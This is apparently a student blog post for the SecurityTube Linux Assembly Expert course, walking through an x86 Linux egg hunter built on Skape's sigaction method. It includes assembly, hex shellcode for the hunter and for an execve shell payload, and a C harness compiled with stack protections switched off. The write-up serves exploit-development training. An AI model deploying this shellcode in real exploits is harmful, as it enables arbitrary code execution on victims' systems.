The third assignment for the x86 SLAE examination is to create an egg hunter that successfully can identify shellcode within an application’s virtual address space.
Introduction
In order to tackle this assessment the help of the de facto egg hunter whitepaper by Skape was leveraged. That can be found here.
The paper details various egg hunter implementations and their pros and cons. Based on Skape’s analysis, the sigaction egg hunter is the most well rounded and will be best suited for the majority of cases. As such, that’s what will be leveraged here. A direct quote elaborating on this can be found below:
This implementation shows marked improvements in almost every category. It is smaller, faster, and maintains nearly the same amount of robustness as the previous [egghunter implementations]. It should certainly be considered the forerunner when selecting an egg hunter, even though it heavily relies on the implementation of sigaction in the kernel not changing. If it were to change to validate oldact prior to calling do_sigaction, the egg hunter implementation would have to change.
While the egg hunter can be customized to search for any repeating 4 bytes, the example identified in the whitepaper will be leveraged here (“\x90\x50\x90\x50\x90\x50\x90\x50"). To use this egg hunter with any shellcode, simply prepend the desired shellcode with the egg as shown below:
"\x90\x50\x90\x50\x90\x50\x90\x50" + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"Egg Hunter Shellcode
Now, the whitepaper does provide some sample assembly of what an egg hunter might look like. However, this shellcode does not search exhaustively so a few modifications must be made. The original shellcode can be found below:
xor ecx, ecx
or cx,0xfff
inc ecx
push byte +0x43
pop eax
int 0x80
cmp al,0xf2
jz 0x0
mov eax,0x50905090
mov edi,ecx
scasd
jnz 0x5
scasd
jnz 0x5
jmp ediThe shellcode above was only modified slightly. Essentially the only change was adding labels instead of having hard coded addresses. With these changes, the shellcode is also more easy to read. The updated code can be found below:
; clear ecx
xor ecx, ecx
jmp short next_address; enumerate pages
next_page:
or cx, 0x0fff; enumerate addresses in page
next_address:
inc ecx
push byte +0x43
pop eax
int 0x80; determine if we can access page
cmp al,0xf2
jz next_page; check if we found egg
mov eax,0x50905090
mov edi,ecx
scasd
jnz next_address
scasd
jnz next_address
jmp edi
Compile the shellcode with the following commands:
nasm -f elf32 egghunter.nasmld -m elf_i386 egghunter.o -o egghunterobjdump -d ./egghunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
And it will output the following shellcode:
"\x31\xc9\xeb\x05\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7"Execution
With the egg hunter ready and the payload (with the egg to hunt), the final application can be built. This looks as follows:
#include <stdio.h>
#include <string.h>unsigned char egghunter[] = \
"\x31\xc9\xeb\x05\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";unsigned char code[] = \
"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";int main()
{
int (*ret)() = (int(*)()) egghunter;
ret();
return 0;
}
Compile the above code with the following and execute it. The egg hunter will find the egg and execute the shellcode:
gcc -m32 -fno-stack-protector -z execstack -o harness harness.c
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: PA-11200
The source code for this assignment can be found here.
